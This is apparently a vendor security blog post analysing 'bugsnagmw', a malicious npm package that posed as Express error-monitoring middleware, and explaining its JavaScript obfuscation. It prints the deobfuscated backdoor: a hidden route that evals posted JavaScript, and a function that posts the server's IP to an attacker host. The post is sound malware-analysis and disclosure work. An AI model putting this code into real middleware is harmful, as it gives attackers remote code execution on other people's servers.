Trusty is a free-to-use web app that provides data and scoring on the supply chain risk for open source packages.
Trusty, Stacklok’s free-to-use service that evaluates open source packages for supply chain risk, recently flagged JavaScript malware published to the npm package registry. The package in question, “bugsnagmw,” contained obfuscated code and partial URLs, and was capable of opening a shell in the victim's application server for an attacker to exploit.
Trusty is Stacklok’s free-to-use service that evaluates open source packages for supply chain risk. As part of our mission to identify healthy packages, and to warn users about malicious packages, we recently re-architected Trusty’s “package ingestion pipeline” to break it into modular components. This refactoring significantly increased its speed, but also allowed us to “shift left” some of our automated package analysis into a system we call the Trusty Threat Pipeline.
The increased speed of our ingestion pipeline, combined with earlier, and faster, package analysis allows us to flag suspicious packages to our security research team as quickly as possible. Now researchers can start analyzing potentially harmful packages within minutes of being published, instead of the industry-standard hours, or even days. This lets us identify and report harmful packages incredibly quickly, meaning that we can give you more information to make good decisions about the packages that you’re using before they become a problem for you.
Since we rolled it out, the Trusty Threat Pipeline has flagged several packages, which we’ve responsibly disclosed to the package registries. Most of them were straightforward – often variations on a dependency confusion or typosquatting attack – but one, in particular, was particularly nasty. This package was advertised as useful middleware for an Express web application – a middleware to perform error monitoring – but, in fact, opened a shell in your application server for an attacker to exploit.
This is exactly the sort of package that we built the Trusty Threat Pipeline to identify – and we think that this particular package is a very interesting example. So we thought that we’d share our analysis. In this post, we’ll look at why the Trusty Threat Pipeline flagged this package, some of the techniques used to avoid detection, and our final analysis of what the package does.
Almost immediately after being published on Thursday, March 21, 2024, Trusty flagged the bugsnagmw package so that our security analysis team could investigate it. Trusty analyzes packages on multiple dimensions, and this package was given a low Trusty Score because:
The package did not have a legitimate source of provenance. Trusty looks at either signed provenance data from sigstore, or historical provenance data, to help identify the source of origin for a package. This helps us ensure a package’s authenticity and integrity.
The package had a very low activity score. Trusty looks at the activity of a package author, as well as activity in a package’s source repository, to help identify high and low-quality packages.
The package had a similar name to an existing popular package, representing a possible typosquatting attack. Trusty analyzes naming similarity across a package registry to help identify when people are attempting to gain installs through mistakes or misdirection.
In addition to having a low Trusty Score, this package had other red flags: the package contained string constants with partial URLs, which suggests that it could be making external API calls to endpoints. More notably, the package contained obfuscated code, which suggests that the author is attempting to hide its actual behavior.
As a result of this, the Trusty Threat Pipeline flagged this package to our researchers for further analysis.
When we first looked at the package, it was clear that it had indeed been obfuscated by the powerful javascript-obfuscator to make analysis difficult. Here’s how the package’s script looks on the npm registry’s code browser:
You can quickly see that the script has had whitespace removed, but this goes beyond typical minification. Function and variable names have been obfuscated so that they have names that are only comprised of hexadigits (eg _0x122a47
), making reading and tracking logic flow difficult.
The team at Stacklok actually sees a fair number of these packages, obfuscated in this way to hide their intent. Understanding the true nature of these packages is critical in risk evaluation. Here’s how we approached deobfuscation and analysis of this particular package.
In software development, obfuscation is the act of creating source or machine code that is difficult for humans or computers to understand.
—Wikipedia
As always, Wikipedia puts it succinctly with a nice TL;DR. Those interested in learning more about code obfuscation, read on.
Code obfuscation involves transforming readable code into a format that's difficult to follow by the human eye, while still maintaining its original functionality. It makes for painful reading by intention, and brain pain a-plenty is its sole purpose. The method is sometimes used to protect intellectual property by making code challenging to reverse engineer, but in our case we are looking at it being employed by attackers.
Obfuscation is not a single thing, it's a grouping of techniques. Variable and function names are often renamed to hexadecimal (e.g. _0x291b
). Algorithms are restructured to unusual flow patterns. Characters and strings are often stored and constructed via arrays where the index is the hex equivalent of an integer (known as “Array Shuffling”), often deployed by hackers to conceal malicious URLs (as we found in the example of bugsnagmw
).
Just to show how nasty obfuscated code is to read, let’s abuse one of the simplest code examples on the planet, “hello world”.
console.log("Hello, World!");
Now even the most beginner of programmers will be able to decipher what is happening above. Print “Hello, World!”, job done!
Let’s now obfuscate the code of our simple Hello World into a pile of horrible syntax vomit:
var _0x291b=['log'];
(function(_0x4bd822,_0x2bd6f7){
var _0x1a0f3a=function(_0x5a5d3c){
while(--_0x5a5d3c){
_0x4bd822['push'](_0x4bd822['shift']());
}
};
_0x1a0f3a(++_0x2bd6f7);
}(_0x291b,0x1b3));
var _0x4bfb=function(_0x2d8f05,_0x4e08d5){
_0x2d8f05=_0x2d8f05-0x0;
var _0x4d74e5=_0x291b[_0x2d8f05];
return _0x4d74e5;
};
var shuffledArray = ['o', 'l', 'd', '!', 'W', ' ', 'H', 'e', 'l', 'l', 'r', 'o'];
function decodeChar(code) { return String.fromCharCode(code); }
function unshuffleArray(array) {
return [
decodeChar(0x48), array[parseInt('111', 2)], array[0o10], array[0b1001],
array[0x0], decodeChar(0x20), decodeChar(0x57), array[parseInt('1010', 2)],
array[0x1], array[0x1], decodeChar(0x64), decodeChar(33)
].join('');
}
console[_0x4bfb('0x0')](unshuffleArray(shuffledArray));
Ugh! Right? Nasty!
So what did we do here? The main thing was to make it a challenge to reconstruct the string ‘Hello World!’. We did this by means of a what would typically resemble an index-based lookup within an array. In this instance, though, we throw in a few different formats to make it particularly hard to follow. For our indices, we use a mix of binary and octal indices: Indices are a mix of binary (0b
...) and octal (0o
...), and parsed from binary strings (parseInt('...', 2))
, making it less straightforward to correlate indices with their positions. We also employ a self-invoking function, taking two parameters. It shuffles the initial array by pushing and shifting elements, although, with only one element, the array remains unchanged. This step adds a layer of extra nastiness without altering functionality.
This is similar to what the javascript-obfuscator
package has done to bugsnagmw
. Let’s analyze it step-by-step.
The first step in analysis is simply being able to start to read the program, which means reformatting it. Once we did that, this function jumped out at us:
function _0x5808() {
const _0x11173f = ['237054jeHhqw', '1834161FfqVqh', 'i.ipify.or', 'tOPbR', 'NmUMH', '210804RGvmIx', 'sSyII', '6379304IXNDzu', '4237008NTmesW', 'g?format=j', '18hEBkiY', 'post', '.24.42.1', '4GGrSjt', 'ETxAC', '11333280pUxuCJ', 'VsuQj', 'express', 'IJGiK', 'return\x20\x27a\x27', 'EijpY', 'get', 'ZOvjL', 'bugsnag', '/pproperty', 'body', 'son', 'http://172', 't\x27);\x0a//\x20\x20\x20', 'setTimeout', 'axios', '/scrappedd', 'catch', 'lXgvx', 'console.lo', '602929MJubhw', 'g(\x27Run\x20tes', 'jEHcf', 'kUiFu', 'sqJsh', 'https://ap', 'send', '7:9999/mh', '35WCGHrh', 'use', 'Router', ';\x0a\x20\x20', 'YBayv'];
_0x5808 = function() {
return _0x11173f;
};
return _0x5808();
}
It’s clearly a string lookup table, containing fragments of string constants. And the control flow is somewhat obfuscated – at first glance, one might think that it gets itself into an infinite loop, where 0x5808
calls back into itself. In fact, this is another obfuscation technique: the outer function sets a variable named 0x5808
to an anonymous function that returns the string table, then invokes it. So ultimately this function simply returns the string table. (Note: a publicly accessible IP address in the lookup table above has been redacted and changed to a reserved IP address.)
Understanding this function is an important first step, but when is it used? This function at the bottom of the script is crucial, you see. The first thing it does is call the _0x5808
function that returns the string lookup table:
function _0x4cfd(_0x42ad4b, _0x44de92) {
const _0x5582da = _0x5808();
return _0x4cfd = function(_0x10efd3, _0x2ab9c3) {
_0x10efd3 = _0x10efd3 - (0xe9 * -0x21 + -0x1a45 * 0x1 + 0x39dd);
let _0x46636f = _0x5582da[_0x10efd3];
return _0x46636f;
}, _0x4cfd(_0x42ad4b, _0x44de92);
}
But what else is going on? This function is incredibly hard to read with all the hexadigits. But it also has a function within a function, unused variables, and use of the relatively uncommon comma operator.
The first step of deobfuscation is to remember that expressions like 0xe9
and 0x21
are numeric literals – constants, albeit represented in hexadecimal form – and anything with a leading underscore is an identifier name – so it’s the name of a function or a variable, but named something like 0x4cfd
to make it difficult to read and scan quickly. We can rewrite this by simplifying the hexadecimal constant arithmetic (0xe9 -0x21 + -0x1a45 0x1 + 0x39dd
), removing the unused variables (0x2ab9c3
, and therefore _0x44de92
as well), and removing the unnecessary call to the inner function. This gives us a function that’s a lot simpler:
function _0x4cfd(idx, _unused) {
const lookup_table = _0x5808();
return lookup_table[idx - 399];
}
Now things are starting to come together, and we can look for uses of this string lookup function. The first place we see it is in the very first statement in the function: const 0x122a47 = 0x4cfd
. So we need to look for _0x122a47
as well. This leads us to a require statement, which is very important to understand what other functionality this script is using:
const express = require(_0x122a47(0x1ab)),
Now we have something going to our string table lookup function, and passing in a value of 427 decimal (0x1ab hexadecimal). Our string table lookup function subtracts 399, giving us index 28 into the string array, meaning that our require statement is trying to load a module named… ”t\x27);\x0a//\x20\x20\x20”
.
That’s probably not what you want.
This package pretty clearly isn’t trying to load a module with a mangled name like that. In fact,
given the name of the variable, and the fact that the string constant express is actually in our dictionary, we expected that this would be trying to require(“express”)
.
Doing some more analysis, it turns out that this nasty little function is doing a lot of heavy lifting:
(function(_0x19b533, _0x3a14dd) {
const _0x491cff = _0x4cfd,
_0x2dcd82 = _0x19b533();
while (!![]) {
try {
const _0x2e6977 = -parseInt(_0x491cff(0x1bd)) / (0x156d + 0x1569 + -0x2ad5) * (-parseInt(_0x491cff(0x1a7)) / (0x1 * 0x2112 + -0xe * 0x1ea + -0x644)) + -parseInt(_0x491cff(0x19f)) / (-0x1 * -0x19d3 + -0x425 * -0x5 + -0x2e89) + parseInt(_0x491cff(0x1a2)) / (0x10d * -0x11 + 0x1 * 0xa7d + 0x764) + -parseInt(_0x491cff(0x195)) / (0x4 * 0x8a6 + 0x7 * 0x439 + 0x4022 * -0x1) * (-parseInt(_0x491cff(0x19a)) / (-0xbb9 * 0x1 + -0x1f2b + -0x6 * -0x727)) + -parseInt(_0x491cff(0x19b)) / (0x4a2 * 0x4 + 0x18fb + -0x1fa * 0x16) + parseInt(_0x491cff(0x1a1)) / (0x1b6b + -0x26f7 + 0xb94) + -parseInt(_0x491cff(0x1a4)) / (-0x261b + -0x20cb + 0x46ef) * (parseInt(_0x491cff(0x1a9)) / (0x1d4c + 0x1d * 0xbf + -0x32e5));
if (_0x2e6977 === _0x3a14dd) break;
else _0x2dcd82['push'](_0x2dcd82['shift']());
} catch (_0x1ea857) {
_0x2dcd82['push'](_0x2dcd82['shift']());
}
}
}(_0x5808, -0x14ee15 + -0xd9a42 + 0x7 * 0x68bee));
Now we’ve seen a lot of these techniques in our prior analysis: we’ve got functions within functions, arithmetic of hexadecimal constants, and variables named to look a lot like those same constants.
But we’ve also got some interesting new control flow obfuscation. First, while (!![]) { … }
is an interesting way to loop. What’s going on here is that an array object – even an empty array – will evaluate as truthy in JavaScript. And it’s not common to see in JavaScript, but you can have two exclamation points together, for a negation of a negation. So while (!![]) { … }
is ultimately equivalent to while (true) { … }
.
During each loop, this odd looking function is called:
_0x2dcd82['push'](_0x2dcd82['shift']());
First, we need to trace back through and understand that 0x2dcd82
is our string lookup table array, which is passed in to this function. Second, we need to remember that in JavaScript, functions are properties on an object, and you can use either dot notation or bracket notation to access them. In other words, 0x2dcd82[‘push’](_0x2dcd82[‘shift’]())
is equivalent to 0x2dcd82.push(0x2dcd82.shift())
. This means that on each loop, the string lookup table is shuffled; the first element is shifted off the front of the array, and then pushed on to the back of the array.
The loop’s exit is actually controlled by calling parseInt
on various values of the string lookup table and applying some arithmetic of the hexadecimal constants to know when to break – which is particularly difficult to reason about, since the string table is being mutated at every loop. But ultimately, this lookup table is shuffled in this way 37 times, and our string lookup table ends up looking like this:
[
'jEHcf', 'kUiFu', 'sqJsh',
'https://ap', 'send', '7:9999/mh',
'35WCGHrh', 'use', 'Router',
';\n ', 'YBayv', '237054jeHhqw',
'1834161FfqVqh', 'i.ipify.or', 'tOPbR',
'NmUMH', '210804RGvmIx', 'sSyII',
'6379304IXNDzu', '4237008NTmesW', 'g?format=j',
'18hEBkiY', 'post', '.24.42.1',
'4GGrSjt', 'ETxAC', '11333280pUxuCJ',
'VsuQj', 'express', 'IJGiK',
"return 'a'", 'EijpY', 'get',
'ZOvjL', 'bugsnag', '/pproperty',
'body', 'son', 'http://172',
"t');\n// ", 'setTimeout', 'axios',
'/scrappedd', 'catch', 'lXgvx',
'console.lo', '602929MJubhw', "g('Run tes"
]
After shuffling, index 28 is actually express, so our require statement does become the expected const express = require(“express”)
.
Now that we’ve seen all these techniques, we can start to simplify the script to actually get to the business logic that’s been obfuscated. We can remove the functions-within-functions, we can turn calls into our string lookup table back into simple string constants, and we can simplify the logic so that we can understand it. What we’re left, is some interesting behavior.
After deobfuscating this, this is the first function in the package:
async function pst_inf() {
try {
let ip_results = {};
try {
let { data: data } = await axios['get']('https://api.ipify.org?format=json');
ip_results = { ...data };
} catch (e1) {}
await axios['post']('http://172.24.42.17:9999/mh', data);
} catch (e2) {}
}
This function makes a call to api.ipify.org
to discover the IP address of the machine that this package is running on, then POSTs the results to an attacker-controlled system at [redacted-ip]
.
(We redacted the above IP address, in the original package this is a machine hosted by a popular cloud provider.)
Sometimes packages do this sort of IP address notification just to “prove” that they were installed – this is common in the dependency confusion examples that we’ve shown before. But as we continue to analyze this application, we discover that knowing the IP address is actually valuable.
Again, this package is claiming to be Express middleware, so its analysis requires us to understand a bit more about how that is configure and used. Middleware itself provides an export of a function – and our bugsnagmw
package does exactly that:
exports['bugsnag'] = st2;
A victim would install this middleware into their application like this:
// create our Express application
const app = express();
// add the bugsnag middleware to our application
await bugsnagmw.bugsnag(app);
// add a default route, and listen on port 4242
app.get('/', async function(req, res) { res.sendStatus(418); })
app.listen(4242);
When a victim follows this pattern to install this middleware into their application, the attacker’s middleware export function – in this case, st2
– will be called with the victim’s Express application as an argument.
The setup for this attack happen during middleware installation, in the st2
function:
async function st2(app) {
const router = express.Router();
router.post('/scrappedd',
increaseTimeoutMiddleware(600000),
catchAsync(async (req, res) => {
res.send(await run(req, res));
})
);
await app.use('/pproperty', router);
pst_inf();
}
This function takes the Express application that the victim provided, and creates a new Express Router to add to it. The new router has a single route, /scrapped
which will call the increaseTimeoutMiddleware
function but, more importantly, call the run function with the web request and response objects. The function then adds that new router to the victim’s application, at the /pproperty
route.
If you’re not familiar with express routing, this means that the attacker has now added a route to the victim’s application. And POST calls to the application at /pproperty/scrapped
will call the attacker’s run function.
The attack itself is in the run function. It just evals
whatever JavaScript is posted to it:
async function run(req, res) {
return eval(req.body['js']);
}
Putting these pieces together, this means that if you install this package as middleware in your Express application, and the attacker can access your server because it’s publicly available, then they can run arbitrary code on it.
We created the Trusty Threat Pipeline to flag potentially malicious packages to our security analysts at Stacklok as quickly as possible. Speed is critical; the faster we identify malicious packages and report them to the package registries, the faster they’re removed and pose no threat to users.
Unfortunately, this speed means that we don’t let the attack develop, which means that we don’t always get to fully understand exactly what the attacker’s goals were with a package, or who the target was. We saw that this attacker was refining this package, making subtle improvements in new versions, right as we were doing the analysis. So they were stopped while they were still in the development stage and before they were able to leverage the attack.
What we do know is:
An attacker published a package that is middleware for the Express web application framework.
The package claims to report bugs to the popular error monitoring platform, Bugsnag, but in fact it sets up a new route into the victim’s web application.
When the victim starts their application, it will ping back to the attacker with the IP address of the web server.
The middleware sets up a new route at /pproperty/scrappedd
. When called, that route accepts POST
payload with JavaScript that will then be executed by the middleware. Finally, it then pings back to the attacker with the victim's IP address. With this set up, the attacker can then call into the victim's web application and execute arbitrary code.
Shortly after discovering this package, we notified the GitHub Trust & Safety team and they removed it from the npm registry. In addition, during analysis, we identified that the host that received IP address reports had outdated server software running, suggesting that it had been compromised by the attacker. We reported this to AWS and the server is no longer operating.
Although it would be interesting to understand who the target of this attack was and observe it unfold, along with its ultimate goals, we’re happy to keep that as an unanswered question, and put the protection of others first. We’re very satisfied that the Trusty Threat Pipeline caught this package as promptly, while the attacker was still in the development phase, and before they were able to start leveraging it as an attack.
Luke Hinds
CTO
Luke Hinds is the CTO of Stacklok. He is the creator of the open source project sigstore, which makes it easier for developers to sign and verify software artifacts. Prior to Stacklok, Luke was a distinguished engineer at Red Hat.
Edward Thomson
Product Manager
Edward is a product manager at Stacklok, overseeing product strategy for Stacklok's products, Minder and Trusty. Prior to Stacklok, he was Director of Product Management at Vercel, and a product manager at GItHub focused on GitHub Actions and npm.